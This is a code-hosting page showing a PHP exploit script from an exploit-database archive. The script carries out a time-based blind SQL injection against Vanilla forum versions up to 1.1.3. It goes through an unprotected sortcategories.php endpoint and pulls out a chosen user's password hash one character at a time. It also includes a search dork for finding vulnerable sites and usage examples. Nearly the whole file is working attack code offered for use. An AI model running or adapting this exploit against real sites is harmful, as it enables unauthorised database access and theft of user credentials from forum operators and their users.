PageRenderTime 48ms CodeModel.GetById 21ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/php/webapps/4548.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 172 lines | 165 code | 3 blank | 4 comment | 13 complexity | e192e883ee77cf4ab908a5e29200cc08 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php

    2. 

  2. ## Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit

    3. 

  3. ## By InATeam (http://inattack.ru/)

    4. 

  4. ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off

    5. 

  5. ## Tested on versions 1.1.3, 1.1.2, 1.0.1

    6. 

  6. 

    7. 

  7. echo "------------------------------------------------------------\n";

    8. 

  8. echo "Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit\n";

    9. 

  9. echo "(c)oded by Raz0r, InATeam (http://inattack.ru/)\n";

    10. 

  10. echo "dork: \"is a product of Lussumo\"\n";

    11. 

  11. echo "------------------------------------------------------------\n";

    12. 

  12. 

    13. 

  13. if ($argc<2) {

    14. 

  14. echo "USAGE:\n";

    15. 

  15. echo "~~~~~~\n";

    16. 

  16. echo "php {$argv[0]} [url] OPTIONS\n\n";

    17. 

  17. echo "[url]        - target server where Vanilla is installed\n\n";

    18. 

  18. echo "OPTIONS:\n";

    19. 

  19. echo "-p=<prefix>  - use specific prefix (default LUM_)\n";

    20. 

  20. echo "-id=<id>     - use specific user id (default 1)\n";

    21. 

  21. echo "-c=<count>   - benchmark()'s loop count (default 300000)\n";

    22. 

  22. echo "-v           - verbose mode\n\n";

    23. 

  23. echo "tip:\n";

    24. 

  24. echo "use bigger number of <count> if server is slow\n\n";

    25. 

  25. echo "examples:\n";

    26. 

  26. echo "php {$argv[0]} http://site.com/vanilla/ -p=forum_ -id=2\n";

    27. 

  27. echo "php {$argv[0]} http://forum.site.com:8080/ -c=400000\n";

    28. 

  28. die;

    29. 

  29. }

    30. 

  30. /**

    31. 

  31. * Software site: http://lussumo.com/

    32. 

  32. *

    33. 

  33. * Script /ajax/sortcategories.php is supposed to be used by admin to sort

    34. 

  34. * the categories. However it isnt protected from unathorized users. Besides,

    35. 

  35. * it doesnt properly sanitize user's input data, so we can inject the SQL * code into the UPDATE query. Script /ajax/sortroles.php is also vulnerable.

    36. 

  36. */

    37. 

  37. error_reporting(0);

    38. 

  38. set_time_limit(0);

    39. 

  39. ini_set("max_execution_time",0);

    40. 

  40. ini_set("default_socket_timeout",20);

    41. 

  41. $url = $argv[1];

    42. 

  42. for($i=2;$i<$argc;$i++) {

    43. 

  43.    if(strpos($argv[$i],"=")!==false) {

    44. 

  44.        $exploded=explode("=",$argv[$i]);

    45. 

  45.        if ($exploded[0]=='-p') $prefix = $exploded[1];

    46. 

  46.        if ($exploded[0]=='-id') $id = $exploded[1];

    47. 

  47.        if ($exploded[0]=='-c') $benchmark = $exploded[1];

    48. 

  48.    }

    49. 

  49.    elseif($argv[$i] == '-v') $verbose=true;

    50. 

  50. }

    51. 

  51. if (!isset($prefix)) $prefix = "LUM_";

    52. 

  52. if (!isset($id)) $id = 1;

    53. 

  53. if (!isset($benchmark)) $benchmark = 300000;

    54. 

  54. if (!isset($verbose)) $verbose=false;

    55. 

  55. 

    56. 

  56. $url_parts = parse_url($url);

    57. 

  57. $host = $url_parts['host'];

    58. 

  58. if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;

    59. 

  59. $path = $url_parts['path'];

    60. 

  60. $query_pattern = "-99'+OR+IF(%s,BENCHMARK(%d,MD5(31337)),1)/*";

    61. 

  61. print "[~] Testing probe delays...\n";

    62. 

  62. $ok=true; $nodelay=0; $withdelay=0;

    63. 

  63. for ($i=1;$i<=3;$i++){

    64. 

  64.    $query = sprintf($query_pattern, "1=1", 1);

    65. 

  65.    $fdelay = get($query);

    66. 

  66.    if ($fdelay!==false) $nodelay+=$fdelay; else {$ok=false;break;}

    67. 

  67.    $query = sprintf($query_pattern, "1=1", $benchmark);

    68. 

  68.    $sdelay = get($query);

    69. 

  69.    if ($sdelay!==false) $withdelay+=$sdelay;  else {$ok=false;break;}

    70. 

  70.    if ($sdelay<=($fdelay*2)) {$ok=false;break;}

    71. 

  71.    usleep($benchmark/1000); $delay=false;

    72. 

  72. }

    73. 

  73. if ($ok) {

    74. 

  74.    $nondelayed = $nodelay/3;

    75. 

  75.    print "[+] Average nondelayed queries response time: ".round($nondelayed,1)." dsecs\n";

    76. 

  76.    $delayed = $withdelay/3;

    77. 

  77.    print "[+] Average delayed queries response time: ".round($delayed,1)." dsecs\n";

    78. 

  78. }

    79. 

  79. else die("[-] Exploit failed\n");

    80. 

  80. print "    Getting hash...";

    81. 

  81. if ($verbose) {print "\r[~]"; print "\n";}

    82. 

  82. $hash='';

    83. 

  83. for($i=1; $i<=32; $i++) {

    84. 

  84.    $chr = gethashchar($i);

    85. 

  85.    if($chr!==false) $hash .= $chr;

    86. 

  86.    else {

    87. 

  87.        $chr = gethashchar($i);

    88. 

  88.        if ($chr !==false)$hash .= $chr;

    89. 

  89.        else die("\n[-] Exploit failed\n");          }   }

    90. 

  90. if (!$verbose) {print "\r[~]"; print "\n";}

    91. 

  91. print "[+] Result: {$hash}\n";

    92. 

  92. 

    93. 

  93. function gethashchar ($pos) {

    94. 

  94.    global $query_pattern,$prefix,$id,$benchmark,$verbose;

    95. 

  95.    $inj = "ORD(SUBSTRING((SELECT+Password+FROM+{$prefix}User+WHERE+UserID={$id}),{$pos},1))";

    96. 

  96.    $query = sprintf($query_pattern, $inj.">57", $benchmark*4);

    97. 

  97.    $success = condition($query);

    98. 

  98.    if (!$success) {

    99. 

  99.        if ($verbose) print "[v] Position {$pos}: char is [0-9]\n";

    100. 

  100.        $min = 48;

    101. 

  101.        $max = 57;          }

    102. 

  102.    else {

    103. 

  103.        if ($verbose) print "[v] Position {$pos}: char is [a-f]\n";

    104. 

  104.        $min = 97;

    105. 

  105.        $max = 102;          }

    106. 

  106.    for($i=$min;$i<=$max;$i++) {

    107. 

  107.        $query = sprintf($query_pattern, $inj."=".$i, $benchmark*4);

    108. 

  108.        $success = condition($query);

    109. 

  109.        if ($success) {

    110. 

  110.            $query = sprintf($query_pattern, $inj."<>".$i, $benchmark*4);

    111. 

  111.            $recheck = condition($query);

    112. 

  112.            if (!$recheck) {

    113. 

  113.                $chr = chr($i);

    114. 

  114.                if ($verbose) print "[v] Position {$pos}: char is {$chr}\n";

    115. 

  115.                return $chr;

    116. 

  116.            }

    117. 

  117.        }

    118. 

  118.    }

    119. 

  119.    return false;

    120. 

  120. }

    121. 

  121. function condition($query) {

    122. 

  122.    global $delayed,$benchmark,$verbose;

    123. 

  123.    for($attempt = 1; $attempt <= 10; $attempt++){

    124. 

  124.        $delay = get($query,true);

    125. 

  125.        if ($delay === false) {

    126. 

  126.            if ($verbose) print "[v] Attempt {$attempt}: error\n";

    127. 

  127.        }

    128. 

  128.        else {

    129. 

  129.            if ($verbose) print "[v] Attempt {$attempt}: success (delay is {$delay} dsecs)\n";                      break;

    130. 

  130.        }

    131. 

  131.    }

    132. 

  132.    if ($attempt == 10) die("[-] Exploit failed\n");

    133. 

  133.    if($delay > ($delayed * 2)) {

    134. 

  134.        usleep(($benchmark*4)/1000);

    135. 

  135.        return true;      }

    136. 

  136.    return false;

    137. 

  137. }

    138. 

  138. function get($query,$gethash=false) {

    139. 

  139.    global $host,$port,$path,$verbose;

    140. 

  140.    if ($gethash&&!$verbose) status();

    141. 

  141.    $start = getmicrotime();

    142. 

  142.    $ock = fsockopen(gethostbyname($host),$port);

    143. 

  143.    if (!$ock) return false;

    144. 

  144.    else {

    145. 

  145.        $packet  = "GET {$path}ajax/sortcategories.php?CategoryID={$query} HTTP/1.0\r\n";

    146. 

  146.        $packet .= "Host: {$host}\r\n";

    147. 

  147.        $packet .= "User-Agent: InAttack User Agent\r\n";

    148. 

  148.        $packet .= "Connection: Close\r\n\r\n";

    149. 

  149.        fputs($ock, $packet);

    150. 

  150.        $html='';

    151. 

  151.        while (!feof($ock)) $html.=fgets($ock);

    152. 

  152.        $end = getmicrotime();

    153. 

  153.        $exploded = explode("\r\n",$html);

    154. 

  154.        $errno=array();

    155. 

  155.        preg_match('@(\d{3})@',$exploded[0],$errno);

    156. 

  156.        if ($errno[1]!=200) die("[-] Exploit failed\n");

    157. 

  157.    }

    158. 

  158.    return intval(($end-$start)*10);

    159. 

  159. }

    160. 

  160. function status() {

    161. 

  161.    static $n;

    162. 

  162.    $n++;

    163. 

  163.    if ($n > 3) $n = 0;

    164. 

  164.    if($n==0){ print "\r[-]\r"; }

    165. 

  165.    if($n==1){ print "\r[\\]\r";}

    166. 

  166.    if($n==2){ print "\r[|]\r"; }

    167. 

  167.    if($n==3){ print "\r[/]\r"; }

    168. 

  168. }

    169. 

  169. function getmicrotime() {return array_sum(explode(" ", microtime()));}

    170. 

  170. ?>

    171. 

  171. 

    172. 

  172. # milw0rm.com [2007-10-20]
    173.